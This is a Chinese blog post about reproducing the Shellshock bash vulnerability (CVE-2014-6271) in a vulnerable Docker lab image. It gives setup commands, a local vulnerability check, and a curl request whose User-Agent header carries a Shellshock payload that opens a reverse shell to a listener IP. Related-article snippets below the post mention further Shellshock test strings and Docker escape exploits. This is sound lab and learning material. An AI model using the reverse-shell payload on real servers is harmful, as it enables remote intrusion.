docker + shellshocker

最新推荐文章于 2024-03-20 09:48:29 发布
最新推荐文章于 2024-03-20 09:48:29 发布
阅读量748 收藏 1
点赞数
分类专栏: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/anzhuangguai/article/details/70234144
版权

OS: ubuntu14.04

测试docker下shellshocker漏洞


验证过程

docker大法好


环境搭建(利用别人已经搭建好的环境测试)

查找环境

docker search shellshock

下载镜像

docker pull hmlio/vaas-cve-2014-6271

查看当前可用镜像

docker images

运行镜像,将docker的80转发到本机的10000,并运行bash程序

docker run -it -p 10000:80 hmlio/vaas-cve-2014-6271 /bin/bash


docker的bash下启动web容器,这个镜像的cgi-bin路径是/usr/lib/cgi-bin/

/usr/sbin/apachectl start

查看正在运行的docker

docker ps

停止运行中的docker

docker stop name(这个name是docker ps中最后的name参数值)

2、攻击
poc测试是不是有这个漏洞(bash 1.14至bash 4.3的Linux/Unix系统存在,阿里云的应该是centos6.5是被修补了)

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

a、curl请求

https://yadi.sk/d/tDQHNKiWm6Ea7


注意前面特殊字符的空格,还有就是程序路径,以前遇上过一个实例,可能是PATH设置问题导致纠结了很久,最好还是带好路径。

curl -A "() { :; }; /bin/bash -i > /dev/tcp/192.168.206.129/2333 0<&1 2>&1" http://192.168.206.130/cgi-bin/stats

b、msf模块


参考:

http://www.cnblogs.com/iamstudy/articles/CVE-2014-6271_shellshock.html

软柿子捏捏
关注
专栏目录
docker部署应用的三种方式——最后一种直接使用shell脚本一键化部署
个人学习笔记库,一篇一篇记录成长的足迹
07-24 1148
docker部署应用的三种方式——最后一种直接使用shell脚本一键化部署
Bash - shellshocker
Nixawk
11-19 825
漏洞编号 测试代码 CVE-2014-6271 env X='() { :; }; echo "CVE-2014-6271 vulnerable"'bash -c id CVE-2014-6277 env X='() { x() { _; }; x() { _; } CVE-2014-6278 env
vulhub漏洞复现之bashShellshock CVE-2014-6271)
weixin_43071873的博客
11-27 1270
Shellshock 破壳漏洞 CVE-2014-6271 1.漏洞概述: GNU Bash 4.3及之前版本在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行shell命令。某些服务和应用允许未经身份验证的远程攻击者提供环境变量以利用此漏洞。此漏洞源于在调用bash shell之前可以用构造的值创建环境变量。这些变量可以包含代码,在shell被调用后会被立即执行。 2.漏洞影响:GNU Bash <= 4.3
linux设置开机自启踩坑记
weixin_42327790的博客
11-17 1168
linux设置开机自启踩坑 前言 相信有一定linux基础的人都知道在linux的 ‘/etc/profile’ 和 ‘/etc/rc.local’ 文件中添加相关shell语句能设置开机自动执行,在实际使用过程中你真的了解他俩的区别嘛。 我我我,通过实际踩坑总算是整明白了其中的门道 1.在/etc/profile文件中设置 此处踩坑!!! 在 ‘/etc/profile/’ 中添加自启脚本语句后reboot重启,ssh登录后发现服务正常启动。 but 在某天开机时未登录系统,也就是没有输入用户
推荐一个强大的Shell工具:ShellCrash
最新发布
gitblog_00091的博客
03-20 1943
推荐一个强大的Shell工具:ShellCrash 项目地址:https://gitcode.com/juewuy/ShellCrash 项目简介 ShellCrash 是一款基于 BashShell 工具,它能够帮助用户快速高效地完成命令行操作。ShellCrash 提供了一系列实用的命令和功能,可以用于快速浏览文件、搜索文件、备份文件、压缩文件等操作。 技术分析 ShellCrash 基...
基于kubernetes+docker+jenkins的DevOps实践
01-27
之前自己的项目开发就搭了个cicd的环境,那时候是在本就...jenkins+dockerregistry+docker 见之前的笔记 总的差不多这样:之后对kubernetes的接触后,就在之前的基础上加入kubernetes,其实也就是在服务器拉取镜像docker
Docker+Jenkins+GitLab+Maven+SpringBoot自动化构建.pdf
09-30
Docker+Jenkins+GitLab+Maven+SpringBoot&SpringCloud;自动化构建
springboot:Docker + Jenkins + GitLab + SpringBoot&SpringCloud + Maven自动构建与部署工程代码
03-15
1,docker常用命令使用 1.1 docker rm命令强制删除容器 docker rm -f 1.2 docker rmi命令强制删除扩展 docker rmi -f 1.3 docker build命令强制指定Dockerfile文件进行编译 docker build -t 镜像名称:镜像版本号-f ...
ASP.NET Core+Docker+Jenkins实现持续集成的完整实例
10-18
主要给大家介绍了关于ASP.NET Core+Docker+Jenkins实现持续集成的相关资料,文中通过示例代码介绍的非常详细,对大家学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
nginx+lua+docker+docker-compose实现简单服务分发
09-03
nginx+lua+docker+docker-compose实现简单服务分发
shocker:查找和利用易受Shellshock攻击的服务器的工具
05-13
令人震惊的 查找和利用易受Shellshock攻击的服务器的工具 参考: : 由NCC Group Plc作为开源发布-https: 由开发: 汤姆·沃森(Tom Watson),汤姆[点]沃森[at] nccgroup [点]信任 根据AGPL发布,请参阅许可以获取更多信息 帮助文字 用法:shocker.py -h,--help显示此帮助消息并退出 --Host HOST,-H HOST目标主机名或IP地址 --file FILE,-f FILE包含目标列表的文件 --port PORT,-p PORT目标端口号(默认为80) --command COMMAND要执行的命令(默认= / bin / uname -a) --cgi CGI,-c CGI要检查的单个CGI(例如/cgi-bin/test.cgi) --proxy现在可以立即使用代理代理,格式为“ ip
shellshocker:ShellShock Live游戏的程序,用于计算击中敌人所需的角度和强度
05-12
Shellshocker
关于使用ProcessBuilder调用shell脚本,以及部署到docker中遇到的问题
qq_42740899的博客
07-05 1496
然后我仔细检查了一下发现 openjdk:8-jdk-alpine镜像用的shell命令是busybox的,它里面的date命令和传统的linux下的date有点区别,其中的。通过仔细查找发现是因为我引用的是openjdk:8-jdk-alpine的镜像,此镜像中是没有提供这些环境的。解决方法时:把shell脚本和jar包拷贝到同一个路径下,在代码中通过绝对路径引用shell脚本,进行执行。这是因为shell脚本被打进jar之后,不再以完整的.sh脚本存在,而是经过了打包程序的编译。后面的参数有些不一样。
linux内网渗透:docker逃逸
TengChuanB的博客
12-17 1880
Docker 逃逸在渗透测试中面向的场景大概是这样,渗透拿到shell后,发现主机是docker环境,要进一步渗透,就必须逃逸到“直接宿主机”。甚至还有物理机运行虚拟机,虚拟机运行Docker容器的情况。那就还要虚拟机逃逸了。
【容器安全防线】Docker攻击方式与防范技术探究
wangluoanquan111的博客
07-29 384
Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中,然后发布到任何流行的Linux或Windows操作系统的机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口。一个完整的Docker有以下几个部分组成:1、DockerClient客户端2、Docker Daemon守护进程3、Docker Image镜像4、DockerContainer容器。
Shocker
weixin_45007073的博客
10-27 199
Shocker靶机信息信息收集漏洞利用权限提升 靶机信息 信息收集 发现靶机开放了web服务和ssh服务 访问web页面,发现是个搞笑的图片 遇到这种情况,我们首先肯定是fuzz一下url的路径啦。这里发现了一个cgi-bin的目录,我们可以以这个为基础继续下一步的fuzz gobuster dir -u "http://10.10.10.56" -w /usr/share/seclists/Discovery/Web-Content/common.txt gobuster dir -u "htt
centos系统-docker容器逃逸
suo_y的博客
04-20 1413
docker-runc CVE-2019-5736(runC容器逃逸漏洞) 1、准备漏洞环境: curl https://gist.githubusercontent.com/thinkycx/e2c9090f035d7b09156077903d6afa51/raw -o install.sh && bash install.sh 2、下载poc,编译脚本 a)下载poc:https://github.com/Frichetten/CVE-2019-5736-PoC b)修改payload
Docker 容器逃逸案例分析
yunqishequ1的博客
07-20 5084
摘要: ## 0. 前言 本文参考自《Docker 容器与容器云》 这个容器逃逸的 case 存在于 Docker 1.0 之前的绝大多数版本。 目前使用 Docker 1.0 之前版本的环境几乎不存在了,这篇分析的主要目的是为了加深系统安全方面的学习。 本案例所分析的 PoC 源码地址:[shocker.c](https://github.com/gabrtv/shocker/b 0.
docker+++qvr
10-25
Docker是一种开源的容器化平台,可以让开发者将应用程序和所有依赖项打包到一个可移植的容器中,以便在任何地方运行。使用Docker可以提高应用程序的可移植性、可靠性和可重复性,同时也可以简化应用程序的部署和管理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值